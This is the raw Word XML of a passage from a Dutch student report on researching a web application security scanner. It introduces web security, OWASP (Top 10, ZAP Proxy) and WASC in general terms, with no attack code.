                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7AD5B74A" w14:textId="6D434390" w:rsidR="002A05E5" w:rsidRPr="00A14BEE" w:rsidRDefault="002A05E5"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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252348416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75561588" wp14:editId="4CC0D3D1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-263525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>644525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3556635" cy="630555"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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0">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261376" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="725BD551" wp14:editId="1C8AE846">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-900430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-843872</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7557135" cy="11435672"/>
                <wp:effectExtent l="0" t="0" r="37465" b="20320"/>
                <wp:wrapNone/>
                <wp:docPr id="21" name="Rectangle 21"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7557135" cy="11435672"/>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6D5D2" id="Rectangle 21" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.9pt;margin-top:-66.4pt;width:595.05pt;height:900.45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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C88E68D" w14:textId="7001932A" w:rsidR="004D5383" w:rsidRDefault="004D5383" w:rsidP="00812142">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252259328" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C5E9F35" wp14:editId="1B2A32C8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-901700</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-599031</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="30" name="Rectangle 3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3B838" id="Rectangle 30" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71pt;margin-top:-47.1pt;width:25pt;height:1031.7pt;z-index:-25105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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F8B394" w14:textId="5CC7973B" w:rsidR="0083191B" w:rsidRPr="00812142" w:rsidRDefault="00740679" w:rsidP="00812142">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="00017EF0" w:rsidRPr="00017EF0">
        <w:t>Onderzoek</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A400921" w14:textId="1F60EB49" w:rsidR="00382817" w:rsidRPr="00382817" w:rsidRDefault="006A33B8" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r w:rsidR="00382817" w:rsidRPr="00382817">
        <w:t>Inleiding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513F9F74" w14:textId="19CECEE0" w:rsidR="00753C7F" w:rsidRDefault="007C4FC2" w:rsidP="004E1E32">
      <w:r>
        <w:t>Dit hoofdstuk zal gaan over mijn onder</w:t>
      </w:r>
      <w:r w:rsidR="000074EF">
        <w:t>zoek die de bas</w:t>
      </w:r>
      <w:r w:rsidR="009E02EE">
        <w:t>is leg</w:t>
      </w:r>
      <w:r w:rsidR="00A51BBB">
        <w:t xml:space="preserve">t voor de </w:t>
      </w:r>
      <w:r w:rsidR="00E357DC">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="00A51BBB">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0054715A">
        <w:t>In dit hoofdstuk heb</w:t>
      </w:r>
      <w:r w:rsidR="004879D1">
        <w:t xml:space="preserve"> ik versc</w:t>
      </w:r>
      <w:r w:rsidR="00CB4A26">
        <w:t>hillende onderwerpen rondom web</w:t>
      </w:r>
      <w:r w:rsidR="004879D1">
        <w:t>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CB4A26">
        <w:t>kunnen</w:t>
      </w:r>
      <w:r w:rsidR="00361D30">
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsidR="00CB4A26">
        <w:t xml:space="preserve"> omdat ik zelf de software test</w:t>
      </w:r>
      <w:r w:rsidR="006362C5">
        <w:t xml:space="preserve">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7C255364" w:rsidR="00382817" w:rsidRDefault="00CB4A26" w:rsidP="004E1E32">
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00382817">
        <w:t>security en de kwetsbaarheden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45537569" w14:textId="74737A7F"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w:t>
      </w:r>
      <w:r w:rsidR="00CB4A26">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00610B93">
        <w:t xml:space="preserve"> wordt met het </w:t>
      </w:r>
      <w:r w:rsidR="00CB4A26">
        <w:t>jaar groter en dat geeft de web</w:t>
      </w:r>
      <w:r w:rsidR="00610B93">
        <w:t>ontwikkelaars de mogelijkheid om websites op verschillende</w:t>
      </w:r>
      <w:r w:rsidR="000A2F36">
        <w:t xml:space="preserve"> manieren te bouwen. </w:t>
      </w:r>
      <w:r w:rsidR="00610B93">
        <w:t>Maar innovaties</w:t>
      </w:r>
      <w:r w:rsidR="000D7D5F">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="008546AB">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00CB4A26">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="008546AB">
        <w:t>ontwikkeling</w:t>
      </w:r>
      <w:r w:rsidR="00CB4A26">
        <w:t>en</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CB4A26">
        <w:t xml:space="preserve"> maken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211FFEDD" w14:textId="059BC66E" w:rsidR="00B71932" w:rsidRDefault="00B71932" w:rsidP="004E1E32">
      <w:r>
        <w:t>Wat zijn de kenmerken van bestaande web scan applicaties?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73561165" w14:textId="26BC4F28" w:rsidR="00940DA7"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rsidR="004752E1">
        <w:t xml:space="preserve"> het mogelijk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D121E0">
        <w:t>dat gebruiker</w:t>
      </w:r>
      <w:r w:rsidR="003D0EF1">
        <w:t>s taken kunnen uitvoeren</w:t>
      </w:r>
      <w:r w:rsidR="00D121E0">
        <w:t xml:space="preserve"> zoals:</w:t>
      </w:r>
      <w:r w:rsidR="00B773EC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004752E1">
        <w:t>persoonlijke accounts maken, het opvragen van digitale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004752E1">
        <w:t xml:space="preserve">informatie, digitale transacties </w:t>
      </w:r>
      <w:r>
        <w:t>maken</w:t>
      </w:r>
      <w:r w:rsidR="004752E1">
        <w:t>, etc</w:t>
      </w:r>
      <w:r w:rsidR="00D121E0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BE3042">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A0CF6">
        <w:t>Al deze nieuwe functionaliteiten brengen ook nieuwe gevaren met zich mee</w:t>
      </w:r>
      <w:r w:rsidR="004752E1">
        <w:t>. H</w:t>
      </w:r>
      <w:r w:rsidR="00196F3F">
        <w:t>ackers die kwetsbaarheden in deze functionaliteiten vinden</w:t>
      </w:r>
      <w:r w:rsidR="004752E1">
        <w:t xml:space="preserve"> krijgen</w:t>
      </w:r>
      <w:r w:rsidR="00196F3F">
        <w:t xml:space="preserve">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752E1">
        <w:t xml:space="preserve">De security </w:t>
      </w:r>
      <w:r w:rsidR="004D50B5">
        <w:t>scanner is een relatief nieuwe begrip, wat pas halverwege de eerste decennia</w:t>
      </w:r>
      <w:r w:rsidR="004752E1">
        <w:t xml:space="preserve"> (2000-2010)</w:t>
      </w:r>
      <w:r w:rsidR="004D50B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00940DA7">
        <w:t xml:space="preserve">zich </w:t>
      </w:r>
      <w:r w:rsidR="004D50B5">
        <w:t>heeft gevestigd als een volwaardige kandidaat op de software</w:t>
      </w:r>
      <w:r>
        <w:t>markt.</w:t>
      </w:r>
      <w:r w:rsidR="007A7291">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00940DA7">
        <w:t xml:space="preserve">Er zijn talloze </w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>webapplicatie scanners</w:t>
      </w:r>
      <w:r w:rsidR="00940DA7">
        <w:t xml:space="preserve"> ontwikkelt ov</w:t>
      </w:r>
      <w:r w:rsidR="00003333">
        <w:t>er de jaren heen. Ik zal in deze paragraaf</w:t>
      </w:r>
      <w:r w:rsidR="004752E1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00940DA7">
        <w:t>twee van deze soort scanners onder de loep nemen en testen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2782D8F4" w14:textId="3CF70E74" w:rsidR="00282839" w:rsidRDefault="00B71932" w:rsidP="004E1E32">
      <w:r>
        <w:t>Welke technologie</w:t>
      </w:r>
      <w:r w:rsidR="00F45444">
        <w:t xml:space="preserve">ën zijn geschikt voor de </w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="00F45444">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC4A8C9" w14:textId="58D82308" w:rsidR="005E5494" w:rsidRDefault="004752E1" w:rsidP="004E1E32">
      <w:r>
        <w:t>Er zijn veel</w:t>
      </w:r>
      <w:r w:rsidR="000A2443">
        <w:t xml:space="preserve"> programmatalen waarmee software </w:t>
      </w:r>
      <w:r w:rsidR="00BF0D2E">
        <w:t>geschreven kan worden maar welke is het meest geschikt voor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dit project</w:t>
      </w:r>
      <w:r w:rsidR="00BF0D2E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001D713A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC6997">
        <w:t xml:space="preserve">In dit deel heb ik onderzoek gedaan naar de verschillende technologieën </w:t>
      </w:r>
      <w:r w:rsidR="002359AC">
        <w:t xml:space="preserve">die ik kan gebruiken voor het ontwikkelen van de </w:t>
      </w:r>
      <w:r>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="002359AC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E228BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C71B2">
        <w:t>Een webapplicatie bestaat uit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> een aantal</w:t>
      </w:r>
      <w:r w:rsidR="007C71B2">
        <w:t xml:space="preserve"> subsystemen</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="007C71B2">
        <w:t xml:space="preserve"> in het ge</w:t>
      </w:r>
      <w:r w:rsidR="00BF0C92">
        <w:t xml:space="preserve">val van de </w:t>
      </w:r>
      <w:r>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="00BF0C92">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">zijn deze: CMS-extensie, </w:t>
      </w:r>
      <w:r w:rsidR="00FC7D8E">
        <w:t xml:space="preserve">API, </w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00FC7D8E">
        <w:t>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4C726726" w14:textId="5D0B1AB7" w:rsidR="005C6663" w:rsidRDefault="005C6663" w:rsidP="004E1E32"/>
    <w:p w14:paraId="303EC671" w14:textId="77777777" w:rsidR="005E5494" w:rsidRDefault="005E5494">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEAEF15" w14:textId="38D5E311" w:rsidR="004D5383" w:rsidRDefault="004D5383" w:rsidP="005E5494">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252136448" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D9102B8" wp14:editId="7AE4D368">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-898525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-603302</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="457" name="Rectangle 4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6167B" id="Rectangle 457" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.75pt;margin-top:-47.45pt;width:25pt;height:1031.7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tb5sCAACz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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B055294" w14:textId="3BA52986" w:rsidR="00573A86" w:rsidRPr="00723BE8" w:rsidRDefault="006A33B8" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00DA5B86">
        <w:t xml:space="preserve"> W</w:t>
      </w:r>
      <w:r w:rsidR="004D61D9" w:rsidRPr="00723BE8">
        <w:t xml:space="preserve">eb </w:t>
      </w:r>
      <w:r w:rsidR="00B674DC" w:rsidRPr="00723BE8">
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="007F2C89">
        <w:t xml:space="preserve"> en de kwetsbaarheden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619439E2" w14:textId="7F0B87DC" w:rsidR="008041D7" w:rsidRDefault="00B27757">
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00E24444">
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidR="00D74EB5">
        <w:t xml:space="preserve">is een </w:t>
      </w:r>
      <w:r w:rsidR="004D61D9">
        <w:t xml:space="preserve">vertakking van </w:t>
      </w:r>
      <w:r w:rsidR="00FE3F03">
        <w:t>Informatiebeveiliging</w:t>
      </w:r>
      <w:r w:rsidR="004D61D9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F0ED1">
        <w:t xml:space="preserve">dat zich specifiek </w:t>
      </w:r>
      <w:r w:rsidR="00014E90">
        <w:t>bezighoudt</w:t>
      </w:r>
      <w:r w:rsidR="0038769D">
        <w:t xml:space="preserve"> met het beveiligen</w:t>
      </w:r>
      <w:r w:rsidR="004F0ED1">
        <w:t xml:space="preserve"> van websites. </w:t>
      </w:r>
      <w:r w:rsidR="00447523">
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="0038769D">
        <w:t>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CE5EC5">
        <w:t xml:space="preserve"> bewerken. Een v</w:t>
      </w:r>
      <w:r w:rsidR="00BE1C59">
        <w:t xml:space="preserve">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437456">
        <w:t xml:space="preserve"> de vorm van </w:t>
      </w:r>
      <w:r w:rsidR="005462AE">
        <w:t>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w:t>
      </w:r>
      <w:r w:rsidR="003C2BB2">
        <w:t>d een website offline te halen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AB3522" w14:textId="33B790D6" w:rsidR="0075337E" w:rsidRDefault="00690DCD">
      <w:r>
        <w:t>Er zijn een aantal non-profit organisati</w:t>
      </w:r>
      <w:r w:rsidR="00C749C3">
        <w:t>es die zich bezighouden met</w:t>
      </w:r>
      <w:r w:rsidR="00247461">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E57B9">
        <w:t>het onderzoeken, documenteren en ontwikkelen van web secur</w:t>
      </w:r>
      <w:r w:rsidR="00B27757">
        <w:t>ity-</w:t>
      </w:r>
      <w:r w:rsidR="001E57B9">
        <w:t xml:space="preserve">applicaties. </w:t>
      </w:r>
      <w:r w:rsidR="006E1C1A">
        <w:t>Dit</w:t>
      </w:r>
      <w:r w:rsidR="001D4DF6">
        <w:t xml:space="preserv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geproduceerd</w:t>
      </w:r>
      <w:r w:rsidR="000A4931">
        <w:t xml:space="preserve"> en hebben een actieve community die </w:t>
      </w:r>
      <w:r w:rsidR="00135CC8">
        <w:t>de projecten onderhouden</w:t>
      </w:r>
      <w:r w:rsidR="00C430A8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5D253B" w14:textId="0B608941" w:rsidR="00BA6377" w:rsidRDefault="00BA6377">
      <w:r>
        <w:t>OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CC9C5F" w14:textId="21931C34"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security. De missie van OWASP vangt één van de es</w:t>
      </w:r>
      <w:r w:rsidR="006C462F">
        <w:t>sentiële concepten van software</w:t>
      </w:r>
      <w:r>
        <w:t>secu</w:t>
      </w:r>
      <w:r w:rsidR="006C462F">
        <w:t>rity. Hun missie is om software</w:t>
      </w:r>
      <w:r w:rsidR="00786CC2">
        <w:t>security zichtbaar te maken, zo</w:t>
      </w:r>
      <w:r>
        <w:t>dat individuen en organisaties geïnformeerde keuzes</w:t>
      </w:r>
      <w:r w:rsidR="00871D21">
        <w:t xml:space="preserve"> kunnen maken. Iedereen kan</w:t>
      </w:r>
      <w:r w:rsidR="00393E6E">
        <w:t xml:space="preserve"> een</w:t>
      </w:r>
      <w:r w:rsidR="00871D21">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bijdragen</w:t>
      </w:r>
      <w:r w:rsidR="00393E6E">
        <w:t xml:space="preserve"> doen bij</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1271"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="2268"/>
      </w:tblGrid>
      <w:tr w:rsidR="008668EF" w14:paraId="15CA7AFD"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0BE3D3" w14:textId="2E250FD0" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Classificatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="402FD0D9" w14:textId="14489431" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="056BDB58" w14:textId="07F23936" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008668EF" w14:paraId="098783D6"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0259" w14:textId="1FDC9486" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Volwassen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20AFB9EB" w14:textId="22E49B0A" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Documentatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="107C3EF2" w14:textId="7E4F52F5" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Top 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008668EF" w14:paraId="63ED4312" w14:textId="77777777" w:rsidTr="008550FD">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ED96BE1" w14:textId="2062F4E4" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Volwassen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="660C66FC" w14:textId="3B93745A" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04D7BFFF" w14:textId="6F41E85B" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>ZAP Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48D9A722" w14:textId="7A371FB0" w:rsidR="00E21220" w:rsidRDefault="002F0F65">
      <w:r>
        <w:t>Tabel 3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4104F5DF" w14:textId="1C0FB3F9" w:rsidR="00DD682C" w:rsidRDefault="001763A1">
      <w:r>
        <w:t>WASC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57138CAC" w14:textId="09FBAC1F" w:rsidR="003A6253" w:rsidRDefault="00E42C50">
      <w:r>
        <w:t>De Web Application Security Consortium is zoals OWASP een or</w:t>
      </w:r>
      <w:r w:rsidR="005E5643">
        <w:t>ganisatie met als missie om web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">security te verbeteren. Hun hoofdmissie is om een standaard te ontwikkelen voor </w:t>
      </w:r>
      <w:r w:rsidR="00650F16">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> security. </w:t>
      </w:r>
      <w:r w:rsidR="00D25A89">
        <w:t>Zij bestaan uit een inter</w:t>
      </w:r>
      <w:r w:rsidR="00481312">
        <w:t xml:space="preserve">nationale groep van experts, </w:t>
      </w:r>
      <w:r w:rsidR="00D25A89">
        <w:t>organisatie</w:t>
      </w:r>
      <w:r w:rsidR="00A76EC4">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00481312">
        <w:t xml:space="preserve"> en</w:t>
      </w:r>
      <w:r w:rsidR="00D25A89">
        <w:t xml:space="preserve"> vertegenwoordigers </w:t>
      </w:r>
      <w:r w:rsidR="00AE40DE">
        <w:t>die open source en best practice security standaards prod</w:t>
      </w:r>
      <w:r w:rsidR="00651DFF">
        <w:t>uceren voor het</w:t>
      </w:r>
      <w:r w:rsidR="002F7AEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00650F16">
        <w:t>wereldwijde</w:t>
      </w:r>
      <w:r w:rsidR="002F7AEC">
        <w:t xml:space="preserve"> web. Zij houden zich echter niet bezig met het ontwikkelen van </w:t>
      </w:r>
      <w:r w:rsidR="00394B19">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252138496" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="15B67A21" wp14:editId="587D79FD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-902476</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-3300871</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="459" name="Rectangle 4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3F840" id="Rectangle 459" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.05pt;margin-top:-259.85pt;width:25pt;height:1031.7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wNJ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Dw5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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00914E98">
        <w:t xml:space="preserve">softwaretools </w:t>
      </w:r>
      <w:r w:rsidR="002C0502">
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="003A6253">
        <w:t>aar</w:t>
      </w:r>
      <w:r w:rsidR="00914E98">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003A6253">
